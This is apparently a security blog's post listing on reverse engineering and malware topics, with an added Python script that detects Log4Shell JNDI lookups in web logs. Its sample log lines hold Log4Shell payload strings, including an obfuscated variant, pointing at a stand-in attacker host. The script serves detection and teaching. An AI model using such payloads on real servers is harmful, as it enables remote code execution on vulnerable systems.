Published in SecurityBreak · Pinned · Member-only
Security Infographics
I often do infographics to share security concepts or best practices. This page will list the different files. I will update it periodically, so stay tuned by following me on Twitter or Medium. If you like these infographics, you can support me on BuyMeACoffee. Thanks! :) Consider becoming a Medium…
Cybersecurity · 3 min read
Published in SecurityBreak · Jun 13
[Reverse Engineering Tips] — IDA Pro Shortcut Cheat Sheet
This is a short post to keep track of the IDA shortcut cheat sheet available here. Happy reversing! :)
Reverse Engineering · 1 min read
Published in SecurityBreak · Jun 8 · Member-only
10 Python Libraries for Malware Analysis and Reverse Engineering
With code examples! — It is no secret that in cybersecurity, Python is probably one of the most versatile languages. It can help you create automation, small snippets, and even bigger apps. Even if you don't like to code, at some point in your cybersecurity career you will find Python useful. I…
Python · 6 min read
Published in SecurityBreak · May 10
External References
This page is used to keep track of my external work, including blogs, research, conferences, and media interviews.
Research Blogs
Title: Using Python to unearth a goldmine of threat intelligence from leaked chat logs
Date: June 2022
URL: Using Python to unearth a goldmine of threat intelligence from leaked chat logs — Microsoft…
Cybersecurity · 5 min read
Published in SecurityBreak · Mar 15
[Reverse Engineering Tips] — Unpacking InnoSetup
To deliver an application, developers can use Windows installers. Windows installers are software components used for installing, maintaining, and removing a program. A Windows installer can be used:
- To bundle software with dependency DLLs or other software
- To add additional commands to run during the installation process
- To load specific configuration required by…
Malware Analysis · 3 min read
Published in SecurityBreak · Feb 21
My Top Books to Learn Malware Analysis and Reverse Engineering
I often get messages from people wanting to learn more about reverse engineering and malware. I always refer to the same books, and I thought it might be a good idea to share my best selection in this blog so that I can easily link to this page. I mostly…
Malware Analysis · 6 min read
Published in SecurityBreak · Dec 21, 2021
Log4Shell Visualization
Log4Shell (CVE-2021-44228) is a zero-day vulnerability in Log4j, a Java logging framework, disclosed in December 2021. The vulnerability allows remote code execution. It is estimated that the exploit affects hundreds of millions of devices, and it is quite simple to execute. The vulnerability takes advantage of…
Log4Shell · 2 min read
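As an added illustration for this entry (editor's example, not code from the original post or its author), the Python below checks access-log lines for the JNDI lookup string Log4Shell abuses. Vulnerable Log4j versions evaluated `${...}` lookups inside logged strings, so a value such as `${jndi:ldap://host/x}` landing in a log message made the logger fetch and load a remote object. Attackers also hid the keyword behind nested lookups like `${lower:j}` and `${::-j}`, so the detector collapses those two tricks before matching. The log lines and the `attacker.example` host are constructed for the example.

```python
import re

# Constructed sample access-log lines for this example (not from the page):
# a plain probe, an obfuscated probe, a benign request, and a non-JNDI lookup.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 '
    '"User-Agent: ${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 '
    '"User-Agent: ${${lower:j}ndi:${lower:l}dap://attacker.example/b}"',
    '10.0.0.7 - - [10/Dec/2021:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 '
    '"User-Agent: Mozilla/5.0"',
    '10.0.0.8 - - [10/Dec/2021:10:00:04 +0000] "GET /?q=${env:HOME} HTTP/1.1" 200 '
    '"User-Agent: curl/7.85.0"',
]

# ${lower:X} / ${upper:X} evaluate to X with its case changed; for matching
# purposes the inner text is all we need, since the final match is case-insensitive.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${name:-default} evaluates to "default" when "name" is undefined, so ${::-j}
# is just "j". Innermost lookups contain no further "${" or "}".
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# After de-obfuscation the payload reads literally ${jndi:<protocol>:...}.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Collapse nested lower/upper and default-value lookups from the inside
    out until the string stops changing (bounded, so crafted input cannot
    keep this loop busy forever)."""
    for _ in range(max_rounds):
        collapsed = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        collapsed = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), collapsed)
        if collapsed == text:
            break
        text = collapsed
    return text


def jndi_protocol(line: str):
    """Return the JNDI protocol named in the line (lower-cased, e.g. 'ldap'),
    or None when no Log4Shell-style lookup survives de-obfuscation."""
    match = _JNDI.search(normalize_lookups(line))
    return match.group(1).lower() if match else None


def scan_logs(lines):
    """Return (line_number, protocol, de-obfuscated line) for each hit."""
    hits = []
    for number, line in enumerate(lines, start=1):
        protocol = jndi_protocol(line)
        if protocol:
            hits.append((number, protocol, normalize_lookups(line)))
    return hits


if __name__ == "__main__":
    for number, protocol, decoded in scan_logs(SAMPLE_LOGS):
        print(f"line {number}: jndi:{protocol} lookup -> {decoded}")
```

The normalization only undoes the two most common obfuscations; other Log4j lookups (`${env:...}`, `${sys:...}`, `${date:...}`) can be combined the same way, so treat a regex like this as a triage filter over web and application logs, not as proof of absence. The presence of any `${...}` lookup in attacker-controlled fields is itself worth flagging.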
Published in SecurityBreak · Dec 10, 2021
[Reverse Engineering Tips] — Extracting MSU files
To understand a vulnerability, it is sometimes useful to study the patch and compare it with the unpatched version to see what has changed. On Windows, patches are distributed through the update process as Microsoft Update Standalone Package (MSU) files. In this RE tip, we are going to see how we can…
Reverse Engineering · 2 min read
Published in SecurityBreak · Nov 26, 2021 · Member-only
3D Printing Industrial Control System Simulation
This article is a repost from the McAfee website. I wrote this during my time at McAfee Labs in the Advanced Threat Research team. It is an industrial simulation with Modbus and a 3D printed industrial system. The original paper can be downloaded here: Industrial Control System (ICS) Simulation (mcafee.com).
Makerlab · 8 min read
Published in SecurityBreak · Nov 25, 2021
[Reverse Engineering Tips] — Enumerators
When doing reverse engineering, it is important to understand the data structures a program can use. Being able to reconstruct these data structures during disassembly will be very useful during your analysis and will improve your understanding of the program. In this RE tip, I will explain a…
Reverse Engineering · 4 min read